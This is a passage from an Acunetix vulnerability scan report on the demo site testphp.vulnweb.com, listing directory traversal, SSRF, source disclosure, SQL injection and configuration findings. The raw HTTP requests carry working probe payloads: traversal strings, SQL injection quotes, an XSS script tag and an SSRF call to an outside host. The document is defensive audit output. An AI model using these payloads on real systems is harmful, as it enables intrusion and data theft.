update=update&uaddress=SELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES&ucc=1234-5678
-2300-9000&uemail=ccccc%40gmail.com&uphone=test&urname=test'"()%26%25<acx><ScRiPt%20>fIR
5(9535)</ScRiPt>
Request headers
54Acunetix Website Audit
Directory traversal (verified)
HighSeverity
ValidationType
Scripting (Directory_Traversal.script)Reported by module
Description
This script is possibly vulnerable to directory traversal attacks. Directory Traversal is a vulnerability which allows attackers to access restricted directories and execute commandsoutside of the web server's root directory.
Impact
By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access files in otherdirectories. As a result, attackers might view restricted files or execute commands, leading to a full compromise of theWeb server.
Recommendation
Your script should filter metacharacters from user input.
References
Acunetix Directory Traversal Attacks
Affected items
/showimage.php
Details
URL encoded GET input file was set to 1ACUSTARTFILE/../../xxx\..\..\ACUENDFILEAdditional details: Source file: /hj/var/www//showimage.php line: 19 File: 1ACUSTARTFILE/../../xxx\..\..\ACUENDFILE.tn "fopen" was called.
GET /showimage.php?file=1ACUSTARTFILE/../../xxx%5c..%5c..%5cACUENDFILE&size=160 HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/showimage.php
Details
URL encoded GET input file was set to 1ACUSTARTFILE/../../xxx\..\..\ACUENDFILEAdditional details: Source file: /hj/var/www//showimage.php line: 7 File: 1ACUSTARTFILE/../../xxx\..\..\ACUENDFILE "fopen" was called.
GET /showimage.php?file=1ACUSTARTFILE/../../xxx%5c..%5c..%5cACUENDFILE HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Referer: http://testphp.vulnweb.com:80/
Request headers
55Acunetix Website Audit
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
56Acunetix Website Audit
Macromedia Dreamweaver remote database scripts
HighSeverity
ConfigurationType
Scripting (Dreamweaver_Scripts.script)Reported by module
Description
Macromedia Dreamweaver has created a directory (_mmServerScripts or _mmDBScripts) that contains scripts fortesting database connectivity. One of these scripts (mmhttpdb.php or mmhttpdb.asp) can be accessed without user ID orpassword and contains numerous operations, such as listing Datasource Names or executing arbitrary SQL queries.
Impact
It is possible to execute arbitrary SQL queries and list datasource names.
Recommendation
Remove these directories from production systems.
References
NGSSoftware advisory
CVE-2004-1893
Affected items
/
Details
Macromedia Dreamweaver scripts found at : //_mmServerScripts/MMHTTPDB.php
GET //_mmServerScripts/MMHTTPDB.php HTTP/1.1
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
57Acunetix Website Audit
nginx SPDY heap buffer overflow
HighSeverity
ConfigurationType
Scripting (Version_Check.script)Reported by module
Description
A heap-based buffer overflow in the SPDY implementation in nginx 1.3.15 before 1.4.7 and 1.5.x before 1.5.12 allowsremote attackers to execute arbitrary code via a crafted request. The problem affects nginx compiled with thengx_http_spdy_module module (which is not compiled by default) and without --with-debug configure option, if the "spdy"option of the "listen" directive is used in a configuration file.
Impact
An attacker can cause a heap memory buffer overflow in a worker process by using a specially crafted request,potentially resulting in arbitrary code execution
Recommendation
Upgrade nginx to the latest version of apply the patch provided by the vendor.
References
nginx security advisory (CVE-2014-0133)
nginx patch
CVE-2014-0133
Affected items
Web Server
Details
Current version is : nginx/1.4.1
58Acunetix Website Audit
PHP allow_url_fopen enabled
HighSeverity
ConfigurationType
Reported by module
Description
The PHP configuration directive allow_url_fopen is enabled. When enabled, this directive allows data retrieval fromremote locations (web site or FTP server). A large number of code injection vulnerabilities reported in PHP-based webapplications are caused by the combination of enabling allow_url_fopen and bad input filtering. allow_url_fopen is enabled by default.
Impact
Application dependant - possible remote file inclusion.
Recommendation
You can disable allow_url_fopen from php.ini or .htaccess. php.iniallow_url_fopen = 'off' .htaccessphp_flag allow_url_fopen off
Affected items
Web Server
Details
Current setting is : allow_url_fopen = On
59Acunetix Website Audit
Script source code disclosure
HighSeverity
ValidationType
Scripting (Script_Source_Code_Disclosure.script)Reported by module
Description
It is possible to read the source code of this script by using script filename as a parameter. It seems that this scriptincludes a file which name is determined using user-supplied data. This data is not properly validated before beingpassed to the include function.
Impact
An attacker can gather sensitive information (database connection strings, application logic) by analyzing the sourcecode. This information can be used to launch further attacks.
Recommendation
Analyze the source code of this script and solve the problem.
References
Source Code Disclosure
Affected items
/showimage.php
Details
URL encoded GET input file was set to showimage.phpSource disclosure pattern found: <?php// header("Content-Length: 1" /*. filesize($name)*/);if( isset($_GET["file"]) && !isset($_GET["size"]) ){ // open the file in a binary mode header("Content-Type: image/jpeg"); $name = $_GET["file"]; $fp = fopen($name, 'rb'); // send the right headers header("Content-Type: image/jpeg"); // dump the picture and stop the script fpassthru($fp); exit;}elseif (isset($_GET["file"]) && isset($_GET["size"])){ header("Content-Type: image/jpeg"); $name = $_GET["file"]; $fp ...
GET /showimage.php?file=showimage.php HTTP/1.1
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
60Acunetix Website Audit
Server side request forgery
HighSeverity
ConfigurationType
Scripting (Server_Side_Request_Forgery.script)Reported by module
Description
SSRF as in Server Side Request Forgery is a vulnerability that allows an attacker to force server interfaces into sendingpackets initiated by the victim server to the local interface or to another server behind the firewall. Consult WebReferences for more information about this problem.
Impact
The impact varies according to the affected server interface.
Recommendation
Your script should properly sanitize user input.
References
SSRF VS. BUSINESS-CRITICAL APPLICATIONS
Affected items
/showimage.php
Details
URL encoded GET input file was set to http://hitMlz50kp76Z.bxss.me/ An HTTP request was initiated for the domain hitMlz50kp76Z.bxss.me which indicates that this script is vulnerable toSSRF (Server Side Request Forgery). HTTP request details: IP address: 176.28.50.165User agent:
GET /showimage.php?file=http://hitMlz50kp76Z.bxss.me/ HTTP/1.1
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/showimage.php
Details
URL encoded GET input file was set to http://hitkqJ3bxpRTL.bxss.me/ An HTTP request was initiated for the domain hitkqJ3bxpRTL.bxss.me which indicates that this script is vulnerable toSSRF (Server Side Request Forgery). HTTP request details: IP address: 176.28.50.165User agent:
GET /showimage.php?file=http://hitkqJ3bxpRTL.bxss.me/&size=160 HTTP/1.1
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Request headers
61Acunetix Website Audit
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
62Acunetix Website Audit
SQL injection
HighSeverity
ValidationType
Scripting (Sql_Injection.script)Reported by module
Description
This script is possibly vulnerable to SQL Injection attacks. SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input.An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn'tproperly filter out dangerous characters. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it isrelatively easy to protect against, there is a large number of web applications vulnerable.
Impact
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of yourdatabase and/or expose sensitive information. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system accessfor the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shellcommands on the underlying operating system. Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database serverfunctions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.
Recommendation
Your script should filter metacharacters from user input. Check detailed information for more information about fixing this vulnerability.
References
OWASP PHP Top 5
Acunetix SQL Injection Attack
VIDEO: SQL Injection tutorial
OWASP Injection Flaws
How to check for SQL injection vulnerabilities
SQL Injection Walkthrough
Affected items
/
Details
Cookie input login was set to 1'"Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in/hj/var/www/index.php on line 47
GET / HTTP/1.1
Cookie: login=1'"; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Referer: http://testphp.vulnweb.com:80/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
63Acunetix Website Audit
/cart.php
Details
URL encoded POST input addcart was set to 1'"Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in/hj/var/www/cart.php on line 82
POST /cart.php?del=2 HTTP/1.1
Content-Length: 11
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
addcart=1'"
Request headers
/cart.php
Details
URL encoded POST input addcart was set to 1'"Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in/hj/var/www/cart.php on line 82
POST /cart.php HTTP/1.1
Content-Length: 21
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
addcart=1'"&price=800
Request headers
/cart.php
Details
Cookie input login was set to 1'"Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in/hj/var/www/cart.php on line 45
GET /cart.php HTTP/1.1
Cookie: login=1'"; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Referer: http://testphp.vulnweb.com:80/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
64Acunetix Website Audit
65Acunetix Website Audit
SQL injection (verified)
HighSeverity
ValidationType
Scripting (Sql_Injection.script)Reported by module
Description
This script is possibly vulnerable to SQL Injection attacks. SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input.An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn'tproperly filter out dangerous characters. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it isrelatively easy to protect against, there is a large number of web applications vulnerable.
Impact
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of yourdatabase and/or expose sensitive information. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system accessfor the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shellcommands on the underlying operating system. Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database serverfunctions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.
Recommendation
Your script should filter metacharacters from user input. Check detailed information for more information about fixing this vulnerability.
References
Acunetix SQL Injection Attack
VIDEO: SQL Injection tutorial
OWASP Injection Flaws
How to check for SQL injection vulnerabilities
SQL Injection Walkthrough
OWASP PHP Top 5
Affected items
/AJAX/infoartist.php
Details
URL encoded GET input id was set to 1ACUSTART'"rw4cwACUENDAdditional details: Source file: /hj/var/www//AJAX/infoartist.php line: 5 SQL query: SELECT * FROM artists WHERE artist_id=1ACUSTART'"rw4cwACUEND "mysql_query" was called.
GET /AJAX/infoartist.php?id=1ACUSTART'"rw4cwACUEND HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Request headers
66Acunetix Website Audit
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/AJAX/infocateg.php
Details
URL encoded GET input id was set to 1ACUSTART'"9xkTnACUENDAdditional details: Source file: /hj/var/www//AJAX/infocateg.php line: 5 SQL query: SELECT * FROM categ WHERE cat_id=1ACUSTART'"9xkTnACUEND "mysql_query" was called.
GET /AJAX/infocateg.php?id=1ACUSTART'"9xkTnACUEND HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/AJAX/infotitle.php
Details
URL encoded POST input id was set to 1ACUSTART'"BYMmLACUENDAdditional details: Source file: /hj/var/www//AJAX/infotitle.php line: 5 SQL query: SELECT * FROM pictures WHERE pic_id=1ACUSTART'"BYMmLACUEND "mysql_query" was called.
POST /AJAX/infotitle.php HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Content-Length: 25
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
id=1ACUSTART'"BYMmLACUEND
Request headers
/artists.php
Details
URL encoded GET input artist was set to 1ACUSTART'"5qFwLACUENDAdditional details: Source file: /hj/var/www//artists.php line: 61 SQL query: SELECT * FROM artists WHERE artist_id=1ACUSTART'"5qFwLACUEND "mysql_query" was called.
Request headers
67Acunetix Website Audit
GET /artists.php?artist=1ACUSTART'"5qFwLACUEND HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/artists.php
Details
Cookie input login was set to 1ACUSTART'"z62ZAACUENDAdditional details: Source file: /hj/var/www//artists.php line: 44 SQL query: SELECT * FROM users WHERE uname='1ACUSTART'"z62ZAACUEND' AND pass='' "mysql_query" wascalled.
GET /artists.php HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Cookie: login=1ACUSTART'"z62ZAACUEND; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Referer: http://testphp.vulnweb.com:80/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/guestbook.php
Details
Cookie input login was set to 1ACUSTART'"fdWcMACUENDAdditional details: Source file: /hj/var/www//guestbook.php line: 49 SQL query: SELECT * FROM users WHERE uname='1ACUSTART'"fdWcMACUEND' AND pass='' "mysql_query" wascalled.
GET /guestbook.php HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Cookie: login=1ACUSTART'"fdWcMACUEND; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Referer: http://testphp.vulnweb.com:80/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
68Acunetix Website Audit
/listproducts.php
Details
URL encoded GET input artist was set to 1ACUSTART'"u7SnqACUENDAdditional details: Source file: /hj/var/www//listproducts.php line: 67 SQL query: SELECT a.*, b.aname, b.artist_id, c.cname FROM pictures a, artists b, categ c WHERE a.cat_id=c.cat_idAND a.a_id=b.artist_id AND a.a_id=1ACUSTART'"u7SnqACUEND "mysql_query" was called.
GET /listproducts.php?artist=1ACUSTART'"u7SnqACUEND HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/listproducts.php
Details
URL encoded GET input cat was set to 1ACUSTART'"2S1FHACUENDAdditional details: Source file: /hj/var/www//listproducts.php line: 61 SQL query: SELECT a.*, b.aname, b.artist_id, c.cname FROM pictures a, artists b, categ c WHERE a.cat_id=c.cat_idAND a.a_id=b.artist_id AND a.cat_id=1ACUSTART'"2S1FHACUEND "mysql_query" was called.
GET /listproducts.php?cat=1ACUSTART'"2S1FHACUEND HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/listproducts.php
Details
URL encoded GET input cat was set to 1ACUSTART'"jKbkhACUENDAdditional details: Source file: /hj/var/www//listproducts.php line: 61 SQL query: SELECT a.*, b.aname, b.artist_id, c.cname FROM pictures a, artists b, categ c WHERE a.cat_id=c.cat_idAND a.a_id=b.artist_id AND a.cat_id=1ACUSTART'"jKbkhACUEND "mysql_query" was called.
GET /listproducts.php?artist=1&cat=1ACUSTART'"jKbkhACUEND HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Referer: http://testphp.vulnweb.com:80/
Request headers
69Acunetix Website Audit
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/listproducts.php
Details
Cookie input login was set to 1ACUSTART'"nEf4zACUENDAdditional details: Source file: /hj/var/www//listproducts.php line: 43 SQL query: SELECT * FROM users WHERE uname='1ACUSTART'"nEf4zACUEND' AND pass='' "mysql_query" wascalled.
GET /listproducts.php HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Cookie: login=1ACUSTART'"nEf4zACUEND; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Referer: http://testphp.vulnweb.com:80/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/Mod_Rewrite_Shop/buy.php
Details
